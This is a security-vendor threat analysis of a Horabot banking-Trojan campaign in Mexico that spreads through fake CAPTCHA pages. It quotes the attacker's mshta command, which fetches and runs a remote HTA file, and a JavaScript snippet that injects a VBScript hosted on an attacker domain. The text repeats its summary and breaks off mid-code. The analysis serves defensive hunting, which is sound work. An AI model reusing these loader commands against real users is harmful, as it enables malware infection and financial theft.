The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico

Kaspersky SOC identified an active Horabot campaign targeting users in Mexico. This complex operation utilizes a banking Trojan bundle distributed via a fake CAPTCHA page that tricks victims into executing malicious mshta commands. The attack chain employs server-side polymorphism, heavy obfuscation, and anti-VM techniques to evade detection. Once established, the malware gathers system information and downloads additional components, including AutoIt executables, to facilitate financial theft and further compromise. Although Kaspersky Endpoint Security successfully intercepted this specific incident, the campaign remains active. Organizations should monitor for suspicious script execution, specifically mshta and VBScript activities originating from browser interactions. Enhanced user awareness regarding fake CAPTCHA lures is critical. Security teams are advised to hunt for polymorphic scripts and unauthorized PowerShell commands within their environments to mitigate the risk of data exfiltration and financial loss associated with this persistent threat.

Kaspersky SOC uncovered and analyzed a complex Horabot campaign in Mexico. In this article we share insights into how it is unleashed and how to hunt for this threat.

Kaspersky SOC identified an active Horabot campaign targeting users in Mexico. This complex operation utilizes a banking Trojan bundle distributed via a fake CAPTCHA page that tricks victims into executing malicious mshta commands. The attack chain employs server-side polymorphism, heavy obfuscation, and anti-VM techniques to evade detection. Once established, the malware gathers system information and downloads additional components, including AutoIt executables, to facilitate financial theft and further compromise. Although Kaspersky Endpoint Security successfully intercepted this specific incident, the campaign remains active. Organizations should monitor for suspicious script execution, specifically mshta and VBScript activities originating from browser interactions. Enhanced user awareness regarding fake CAPTCHA lures is critical. Security teams are advised to hunt for polymorphic scripts and unauthorized PowerShell commands within their environments to mitigate the risk of data exfiltration and financial loss associated with this persistent threat. Kaspersky SOC uncovered and analyzed a complex Horabot campaign in Mexico. In this article we share insights into how it is unleashed and how to hunt for this threat. Introduction In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot , a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain. Although previous research has documented Horabot campaigns ( here and here ), our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses. The starting point As usual, our story begins with an alert that popped up in one of our customers’ environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity. The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process (via a proactive defense module ( PDM )) and removed the related files before the threat could progress any further. The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign. The attack chain After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds. Stage 1: Initial lure Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/ (details about its content can be found here ). Fake CAPTCHA page at the URL https://evs.grupotuis[.]buzz/0capcha17/ Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below: mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta This command retrieved and executed an HTA file that contained the following: It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker’s domain. The body contains a large block of random, meaningless text that serves purely as filler. Stage 2: A pinch of server-side polymorphism The payload loaded by the HTA file dynamically creates a new element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage. var scriptEle = document.createElement("script"); scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/"); scriptEle.setAttribute("type", "text/vbscript"); document.getElementsByTagName('head')[0].appendChild(scriptEle); The next-stage VBS content resembles the example shown below. During our analysis, we observed the use of server-side polymorphism because each access to the same resource returned a slightly different version of the code while preserving the same functionality. The script is obfuscated and employs a custom string encoding routine. Below is a more readable version with its strings decoded and replaced using a small Python script that replicates the decode_str() routine. The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript. var scriptEle =...